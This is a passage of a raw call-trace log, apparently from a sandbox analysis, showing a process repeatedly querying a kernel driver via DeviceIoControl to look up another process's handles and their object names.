lpBytesReturned=0x12d450*=0x90, lpOverlapped=0x0) returned 1 [0245.555] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.555] PsAcquireProcessExitSynchronization () returned 0x0 [0245.555] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.555] ObReferenceObjectByHandle (in: Handle=0x1234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002525f20, HandleInformation=0x0) returned 0x0 [0245.555] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.555] PsReleaseProcessExitSynchronization () returned 0x2 [0245.555] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.555] ObQueryNameString (in: Object=0xfffffa8002525f20, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.555] ObfDereferenceObject (Object=0xfffffa8002525f20) returned 0x11 [0245.555] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.555] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.555] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.555] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.555] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.555] PsAcquireProcessExitSynchronization () returned 0x0 [0245.555] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.555] ObReferenceObjectByHandle (in: Handle=0x1240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800254f960, HandleInformation=0x0) returned 0x0 [0245.555] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.555] PsReleaseProcessExitSynchronization () returned 0x2 [0245.555] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.555] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.555] ObfDereferenceObject (Object=0xfffffa800254f960) returned 0x1 [0245.555] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.555] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.555] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.555] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.556] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.556] PsAcquireProcessExitSynchronization () returned 0x0 [0245.556] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.556] ObReferenceObjectByHandle (in: Handle=0x1248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80025536e0, HandleInformation=0x0) returned 0x0 [0245.556] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.556] PsReleaseProcessExitSynchronization () returned 0x2 [0245.556] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.556] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.556] ObfDereferenceObject (Object=0xfffffa80025536e0) returned 0x1 [0245.556] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.556] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.556] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.556] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.556] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.556] PsAcquireProcessExitSynchronization () returned 0x0 [0245.556] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.556] ObReferenceObjectByHandle (in: Handle=0x1290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b618a0, HandleInformation=0x0) returned 0x0 [0245.556] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.556] PsReleaseProcessExitSynchronization () returned 0x2 [0245.556] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.556] ObQueryNameString (in: Object=0xfffff8a001b618a0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.556] ObfDereferenceObject (Object=0xfffff8a001b618a0) returned 0x1 [0245.556] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.556] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.556] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.557] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.557] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.557] PsAcquireProcessExitSynchronization () returned 0x0 [0245.557] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.557] ObReferenceObjectByHandle (in: Handle=0x1294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b9c6c0, HandleInformation=0x0) returned 0x0 [0245.557] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.557] PsReleaseProcessExitSynchronization () returned 0x2 [0245.557] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.557] ObQueryNameString (in: Object=0xfffff8a001b9c6c0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.557] ObfDereferenceObject (Object=0xfffff8a001b9c6c0) returned 0x1 [0245.557] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.557] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.557] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.557] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.557] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.557] PsAcquireProcessExitSynchronization () returned 0x0 [0245.557] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.557] ObReferenceObjectByHandle (in: Handle=0x1298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036d2730, HandleInformation=0x0) returned 0x0 [0245.557] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.557] PsReleaseProcessExitSynchronization () returned 0x2 [0245.557] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.557] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.557] ObfDereferenceObject (Object=0xfffffa80036d2730) returned 0x2 [0245.557] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.558] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.558] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.558] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.558] PsAcquireProcessExitSynchronization () returned 0x0 [0245.558] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.558] ObReferenceObjectByHandle (in: Handle=0x12a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020cd2d0, HandleInformation=0x0) returned 0x0 [0245.558] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.558] PsReleaseProcessExitSynchronization () returned 0x2 [0245.558] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.558] ObQueryNameString (in: Object=0xfffffa80020cd2d0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.558] ObfDereferenceObject (Object=0xfffffa80020cd2d0) returned 0x1 [0245.558] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.558] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.558] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.558] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.558] PsAcquireProcessExitSynchronization () returned 0x0 [0245.558] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.558] ObReferenceObjectByHandle (in: Handle=0x12a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002176990, HandleInformation=0x0) returned 0x0 [0245.558] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.558] PsReleaseProcessExitSynchronization () returned 0x2 [0245.558] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.558] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.558] ObfDereferenceObject (Object=0xfffffa8002176990) returned 0x2 [0245.558] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.558] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.559] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0245.559] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.559] PsAcquireProcessExitSynchronization () returned 0x0 [0245.559] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.559] ObReferenceObjectByHandle (in: Handle=0x12ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80036d25e0, HandleInformation=0x0) returned 0x0 [0245.559] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.559] PsReleaseProcessExitSynchronization () returned 0x2 [0245.559] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.559] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.559] ObfDereferenceObject (Object=0xfffffa80036d25e0) returned 0x2 [0245.559] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.559] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.559] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.559] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.559] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.559] PsAcquireProcessExitSynchronization () returned 0x0 [0245.559] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.559] ObReferenceObjectByHandle (in: Handle=0x12b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b3eb10, HandleInformation=0x0) returned 0x0 [0245.559] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.559] PsReleaseProcessExitSynchronization () returned 0x2 [0245.559] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.559] ObQueryNameString (in: Object=0xfffff8a001b3eb10, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.559] ObfDereferenceObject (Object=0xfffff8a001b3eb10) returned 0x1 [0245.559] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.559] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.560] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.560] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.560] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.560] PsAcquireProcessExitSynchronization () returned 0x0 [0245.560] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.560] ObReferenceObjectByHandle (in: Handle=0x12b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b55a60, HandleInformation=0x0) returned 0x0 [0245.560] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.560] PsReleaseProcessExitSynchronization () returned 0x2 [0245.560] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.560] ObQueryNameString (in: Object=0xfffff8a001b55a60, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.560] ObfDereferenceObject (Object=0xfffff8a001b55a60) returned 0x1 [0245.560] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.560] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.560] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.560] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.560] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.560] PsAcquireProcessExitSynchronization () returned 0x0 [0245.560] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.560] ObReferenceObjectByHandle (in: Handle=0x12b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800b53c5a0, HandleInformation=0x0) returned 0x0 [0245.560] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.560] PsReleaseProcessExitSynchronization () returned 0x2 [0245.560] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.560] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.560] ObfDereferenceObject (Object=0xfffffa800b53c5a0) returned 0x2 [0245.560] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.560] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.560] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.561] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0245.561] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.561] PsAcquireProcessExitSynchronization () returned 0x0 [0245.561] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.561] ObReferenceObjectByHandle (in: Handle=0x12c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800b53c6f0, HandleInformation=0x0) returned 0x0 [0245.561] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.561] PsReleaseProcessExitSynchronization () returned 0x2 [0245.561] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.561] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.561] ObfDereferenceObject (Object=0xfffffa800b53c6f0) returned 0x2 [0245.561] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.561] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.561] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.561] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.561] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.561] PsAcquireProcessExitSynchronization () returned 0x0 [0245.561] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.561] ObReferenceObjectByHandle (in: Handle=0x12cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001b56230, HandleInformation=0x0) returned 0x0 [0245.561] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.561] PsReleaseProcessExitSynchronization () returned 0x2 [0245.561] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.561] ObQueryNameString (in: Object=0xfffff8a001b56230, ObjectNameInfo=0xfffffa800306c7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306c7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.561] ObfDereferenceObject (Object=0xfffff8a001b56230) returned 0x1 [0245.561] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.561] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.562] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.562] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x10c, lpOverlapped=0x0) returned 1 [0245.562] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.562] PsAcquireProcessExitSynchronization () returned 0x0 [0245.562] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.562] ObReferenceObjectByHandle (in: Handle=0x12d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ec1210, HandleInformation=0x0) returned 0x0 [0245.562] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.562] PsReleaseProcessExitSynchronization () returned 0x2 [0245.562] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x189 [0245.562] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.562] ObfDereferenceObject (Object=0xfffffa8001ec1210) returned 0x11 [0245.562] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.562] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.562] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.562] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0245.562] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.562] PsAcquireProcessExitSynchronization () returned 0x0 [0245.562] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.562] 